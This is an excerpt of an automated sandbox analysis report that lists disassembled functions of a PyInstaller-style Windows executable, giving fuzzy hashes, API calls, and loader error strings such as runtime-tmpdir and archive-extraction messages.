Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: FC51B432A18A5196E7248B29C44023837A1EB46F58FB48571CE5EDB7E4EF3BE843C740

Function 00007FF6F0BE1FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: f32eab3e791b284cbb52b65d844dd065b8f9308c3e99ee83f0e15d724f35ad7c
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: C551B376A1865196EB248B29C44023C37A0EB46F58FA44171CE5EA77E9EF3BED43C740

Function 00007FF6F0BE17B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 836eff59c902d9fbd147157f59b6029ab22a642af13fc736e4a5a17c2548f6b3
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 4E51CF3AA1865196E7248B28C05023C23A1EB46F58FB45571CE5E977D9EF3BEC43C780

Function 00007FF6F0BE5DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 3b2931d968b86fc79f35ce0f3a2766791ea442c57991d52fef3f1567799216b3
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 5041A972C0D74EA4EF65892809246B856809F63BA1ED852F4DDBBD33C7FD0E6A468101

Function 00007FF6F0BE9F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: ff6440e8219042213bc2f25f94495bfdcfb87629890990739fcb9261a7a10f5a
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 814128B2718A5592EF04CF6ADA14169B3A5FB48FD4B49A032DE1ED7B94EE3DD4418300

Function 00007FF6F0BE8154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction ID: 0d0b39d1ce1f7187f5d02932b05ed1837292a3b731d52dfc2a03d9e031f7013d
Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction Fuzzy Hash: 6F31B632B18F4282E7649F25684013E66D5AF86BD0F944279EB6FA3BE5EF3DD0124704

Function 00007FF6F0BF95E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: 8ee55efe46a1599b954dfd0bb33bcd7b166ada8c5c120d50551233eeb44e2666
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: C1F068717182569ADBA88F6DA40262977E0FB483C4FC08039D59DC3B54DE3CD0628F04

Function 00007FF6F0BDD37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: e323d69542c584f234f333179540efc3eaa8e4c9b712c4e6978e6ba30c01d0b7
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: D9A0022994DC0AF0E7448B40E8905356736FB52311BC00035E06FC22F0BF3EA400D305

Function 00007FF6F0BD5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5830
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5842
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5879
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD588B
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58A4
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58B6
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58CF
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58E1
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58FD
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD590F
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD592B
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD593D
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5959
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD596B
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5987
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5999
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59B5
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59C7

Strings

Py_ExitStatusException, xrefs: 00007FF6F0BD589A, 00007FF6F0BD58BC
PyObject_CallFunctionObjArgs, xrefs: 00007FF6F0BD5D15, 00007FF6F0BD5D37
PyUnicode_DecodeFSDefault, xrefs: 00007FF6F0BD5F0F, 00007FF6F0BD5F31
PyErr_Occurred, xrefs: 00007FF6F0BD5B1B, 00007FF6F0BD5B3D
PyUnicode_Join, xrefs: 00007FF6F0BD5F99, 00007FF6F0BD5FBB
PyImport_ExecCodeModule, xrefs: 00007FF6F0BD5C01, 00007FF6F0BD5C23
PyUnicode_FromString, xrefs: 00007FF6F0BD5F6B, 00007FF6F0BD5F8D
PyObject_GetAttrString, xrefs: 00007FF6F0BD5D43, 00007FF6F0BD5D65
PyUnicode_Replace, xrefs: 00007FF6F0BD5FC7, 00007FF6F0BD5FE9
PyObject_SetAttrString, xrefs: 00007FF6F0BD5D71, 00007FF6F0BD5D93
Py_IsInitialized, xrefs: 00007FF6F0BD5921, 00007FF6F0BD5943
PyConfig_SetString, xrefs: 00007FF6F0BD5A35, 00007FF6F0BD5A57
PyUnicode_AsUTF8, xrefs: 00007FF6F0BD5EB3, 00007FF6F0BD5ED5
PyErr_NormalizeException, xrefs: 00007FF6F0BD5AED, 00007FF6F0BD5B0F
PyErr_Fetch, xrefs: 00007FF6F0BD5ABF, 00007FF6F0BD5AE1
PyUnicode_Decode, xrefs: 00007FF6F0BD5EE1, 00007FF6F0BD5F03
Py_InitializeFromConfig, xrefs: 00007FF6F0BD58F3, 00007FF6F0BD5915
PyEval_EvalCode, xrefs: 00007FF6F0BD5BA5, 00007FF6F0BD5BC7
PyErr_Print, xrefs: 00007FF6F0BD5B49, 00007FF6F0BD5B6B
PyModule_GetDict, xrefs: 00007FF6F0BD5CB9, 00007FF6F0BD5CDB
PyConfig_SetWideStringList, xrefs: 00007FF6F0BD5A63, 00007FF6F0BD5A85
PyImport_AddModule, xrefs: 00007FF6F0BD5BD3, 00007FF6F0BD5BF5
Py_Finalize, xrefs: 00007FF6F0BD58C5, 00007FF6F0BD58E7
PyStatus_Exception, xrefs: 00007FF6F0BD5E29, 00007FF6F0BD5E4B
PySys_SetObject, xrefs: 00007FF6F0BD5E85, 00007FF6F0BD5EA7
PyErr_Restore, xrefs: 00007FF6F0BD5B77, 00007FF6F0BD5B99
PyErr_Clear, xrefs: 00007FF6F0BD5A91, 00007FF6F0BD5AB3
Failed to get address for %hs, xrefs: 00007FF6F0BD5851
PyConfig_Clear, xrefs: 00007FF6F0BD597D, 00007FF6F0BD599F
PyObject_Str, xrefs: 00007FF6F0BD5D9F, 00007FF6F0BD5DC1
PyImport_ImportModule, xrefs: 00007FF6F0BD5C2F, 00007FF6F0BD5C51
PyObject_CallFunction, xrefs: 00007FF6F0BD5CE7, 00007FF6F0BD5D09
Py_DecodeLocale, xrefs: 00007FF6F0BD586F, 00007FF6F0BD5891
PyMarshal_ReadObjectFromString, xrefs: 00007FF6F0BD5C5D, 00007FF6F0BD5C7F
PyConfig_InitIsolatedConfig, xrefs: 00007FF6F0BD59AB, 00007FF6F0BD59CD
PyUnicode_FromFormat, xrefs: 00007FF6F0BD5F3D, 00007FF6F0BD5F5F
GetProcAddress, xrefs: 00007FF6F0BD5858
PyConfig_Read, xrefs: 00007FF6F0BD59D9, 00007FF6F0BD59FB
PyRun_SimpleStringFlags, xrefs: 00007FF6F0BD5DFB, 00007FF6F0BD5E1D
PyConfig_SetBytesString, xrefs: 00007FF6F0BD5A07, 00007FF6F0BD5A29
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6F0BD5DCD, 00007FF6F0BD5DEF
Py_DecRef, xrefs: 00007FF6F0BD5826, 00007FF6F0BD5848
PyMem_RawFree, xrefs: 00007FF6F0BD5C8B, 00007FF6F0BD5CAD
PySys_GetObject, xrefs: 00007FF6F0BD5E57, 00007FF6F0BD5E79
Py_PreInitialize, xrefs: 00007FF6F0BD594F, 00007FF6F0BD5971

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: d27a3dc65abff6921c8fa578cb9386e4c3360e7c04281b7a001f2128a5e72cb7
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 3422652890EB07F1FB559BA5B91897562A9AF06756FC45035C83F833E0FF7EB5889200

Function 00007FF6F0BD81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6F0BD88A7,?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD821C

Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6F0BD8230
\, xrefs: 00007FF6F0BD8251
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6F0BD81F3
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6F0BD828D
%.*s, xrefs: 00007FF6F0BD82FC
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6F0BD82C9
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6F0BD8363
CreateDirectory, xrefs: 00007FF6F0BD836C

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: 2122c61fddc9ac755c32be2b55d3e5714d38cb3082ddcf2f8103a818439cdb96
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: 4351D821A1E683B1FB509B60E8516BAA366EF96781FC44031E92FC37D5FE3EE5058740

Function 00007FF6F0BD2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6F0BD21AB
SelectObject.GDI32 ref: 00007FF6F0BD21F2
DrawTextW.USER32 ref: 00007FF6F0BD2215
SelectObject.GDI32 ref: 00007FF6F0BD222B
ReleaseDC.USER32 ref: 00007FF6F0BD223B
MoveWindow.USER32 ref: 00007FF6F0BD228B
MoveWindow.USER32 ref: 00007FF6F0BD22CB
MoveWindow.USER32 ref: 00007FF6F0BD231E
MoveWindow.USER32 ref: 00007FF6F0BD2366

Strings

P%, xrefs: 00007FF6F0BD21FF

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 6e1f8c7775155a737b8344f35aab00d046834222019df077205ccdbfd13550fd
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: A6510626604BA186D7249F22E4185BAB7A1FB98B61F004125EBDF83795EF3DD045DB10

Function 00007FF6F0BD80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6F0BD80EF
GetWindowLongPtrW.USER32 ref: 00007FF6F0BD816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6F0BD8182
GetLastError.KERNEL32 ref: 00007FF6F0BD818C
SetWindowLongPtrW.USER32 ref: 00007FF6F0BD81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF6F0BD8175

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: a5614849f8203546173ac6eec0ca5a0c0e075c1f7f9dab151b241fa8f974548d
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 4921E525B09A42D2E7454BBAA854579A255FF8AB92F884130DF3FC33D4FE2DD5858300

Function 00007FF6F0BE6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE69CC

Strings

:, xrefs: 00007FF6F0BE64FC
p, xrefs: 00007FF6F0BE646D
f, xrefs: 00007FF6F0BE6465
p, xrefs: 00007FF6F0BE63F5
-, xrefs: 00007FF6F0BE63D9

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 6f3795f9fda3e88f4eea34e79635956c3c1b7d4a4efaf9c6df4ed329367011db
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 4212C276E0C143A6FB249A14E1542B976A1FB527D4FC44175E6AB87BC4FF3EE9808B00

Function 00007FF6F0BE1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE16DF

Strings

p, xrefs: 00007FF6F0BE111D
p, xrefs: 00007FF6F0BE1182
f, xrefs: 00007FF6F0BE117A
f, xrefs: 00007FF6F0BE1110
f, xrefs: 00007FF6F0BE12C5

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 205dc92ebd49949720dff3d89ade4fbf1a4ee3d0763243f892527f65f18e6c97
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 1812B772E0C143A6FB209A15E0546797261FB82754FE84875D6ABC77C4EF7EE880CB14

Function 00007FF6F0BD1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6F0BD1098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6F0BD1108
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6F0BD10CC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6F0BD11F6
malloc, xrefs: 00007FF6F0BD110F
fseek, xrefs: 00007FF6F0BD10D3
fread, xrefs: 00007FF6F0BD11FD

Memory Dump Source

